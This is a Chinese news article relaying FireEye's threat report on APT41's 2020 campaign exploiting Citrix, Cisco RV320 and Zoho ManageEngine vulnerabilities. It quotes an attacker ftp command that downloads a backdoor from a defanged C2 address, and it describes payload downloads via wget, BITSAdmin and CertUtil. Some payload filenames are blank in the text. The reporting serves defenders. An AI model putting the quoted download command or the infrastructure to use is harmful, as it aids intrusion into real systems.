美安全公司FireEye：中国黑客组织APT41试图发起全球入侵活动

美国网络安全巨头FireEye于近日发文称，被他们判定来自中国的黑客组织APT41从今年年初开始发起了自该组织成立以来规模最大的入侵活动，波及澳大利亚、加拿大、丹麦、芬兰、法国、印度、意大利、日本、马来西亚、墨西哥、菲律宾、波兰、卡塔尔、沙特阿拉伯、新加坡、瑞典、瑞士、阿联酋、英国以及美国等数十个国家。

FireEye在文章中指出，在1月20日至3月11日期间，APT41利用CitrixNetScaler/ADC、思科路由器以及ZohoManageEngineDesktopCentral中的漏洞攻击了分属银行/金融、建筑、国防、政府、医疗、高科技、高等教育、法律、制造业、媒体、非营利、石油和天然气、石化、制药、房地产、电信、运输、旅行以及软件等众多行业的组织，其中有超过75家是FireEye的客户。

为了证实其说法的真实性，FireEye在文章中还公布了他们针对这起入侵活动的调查成果。接下来，就让我们一起来看看吧。

FireEye表示，APT41从1月20日开始试图利用CVE-2019-19781（于2019年12月17日被公开披露）入侵CitrixApplicationDeliveryController（ADC）和CitrixGateway设备。

图1.FireEye整理的关键事件时间表

1月20日和1月21日的CVE-2019-19781漏洞利用活动涉及到执行命令“file/bin/pwd”，这可以帮助APT41实现两个目标：一是能够确认系统是否已安装补丁，进而判断设备是否能够被入侵；二是能够获取到与系统体系结构相关的信息（据称，这是为了给后续部署后门做准备）。

图2.CVE-2019-19781漏洞利用HTTP流量示例（1月20日和1月21日）

1月23至2月1日，漏洞利用活动出现了短暂的中断。FireEye认为，这很可能与1月24日至1月30期间的中国农历新年假期有关。

从2月1日开始，APT41开始执行命令“/usr/bin/ftp-o/tmp/bsdftp://test:[redacted]\@66.42.98[.]220/bsd”，以下载被命名为“bsd”的有效载荷（被FireEye怀疑是一种新后门）。

图3.CVE-2019-19781漏洞利用HTTP流量示例（2月1日）

2月2日至2月19日，漏洞利用活动再次中断。FireEye认为，这很可能与中国爆发的新型肺炎疫情有关。

2月24日和2月25日，针对CVE-2019-19781的漏洞利用明显增加，且利用行为几乎与2月1日的活动几乎完全一致，仅仅是将有效载荷的名称更改为了“un”。

图4.CVE-2019-19781漏洞利用HTTP流量示例（2月24日和2月25日）

FireEye表示，APT41在2月21日成功利用漏洞侵入了一家电信组织的CiscoRV320路由器，并下载了名为“fuc”的有效载荷。尽管尚不清楚利用的是哪些漏洞，但可以的是，其中一个模块结合利用了CVE-2019-1653和CVE-2019-1652，这允许攻击者在CiscoRV320和RV325小型企业路由器上实现远程代码执行，并使用wget下载指定的有效载荷。

图5.CiscoRV320路由器通过wget下载有效载荷的HTTP请求示例

FireEye表示，APT41从3月8日开始试图利用CVE-2020-10189攻击目标组织，设计两种有效载荷部署方式。

第一种方式涉及利用CVE-2020-10189漏洞直接上传基于Java的简单程序“”，其中包含一组可用于使用PowerShell下载并执行和的命令。

图6.的内容

第二种方式涉及利用MicrosoftBITSAdmin命令行工具从端口12345上的已知APT41基础设施66[.]42[.]98[.]220下载。

无论是方式一还是方式二，它们都涉及到使用来实现被命名为“”的CobaltStrikeBEACON加载程序的长久驻留。

图7.的内容

在漏洞利用成功之后，APT41使用后门下载了另一个具有不同C2地址的辅助后门，进而利用该后门下载了2.exe（VMProtectedMeterpreter下载器，用于下载CobaltStrikeBEACONshellcode）。

图8.通过CertUtil下载2.exe的HTTP请求示例

Meterpreter下载器“TzGG”被配置为通过端口443与91[.]208[.]184[.]78通信，以下载CobaltStrikeBEACON（试用版）的shellcode。

图9.下载CobaltStrikeBEACONshellcode的HTTP请求示例

FireEye表示，在这场规模庞大的入侵活动中，尽管APT41使用的是一些公开可用的恶意软件（如CobaltStrike和Meterpreter），但从该组织此前的活动来看，他们必定会在后续部署更为高级的恶意软件。

FireEye还表示，即使到了2020年，APT41在他们所追踪的黑客组织中仍是最强劲的一个。新发现的这场入侵活动也再次表明，该组织确实拥有快速利用新披露的漏洞来发起攻击的能力。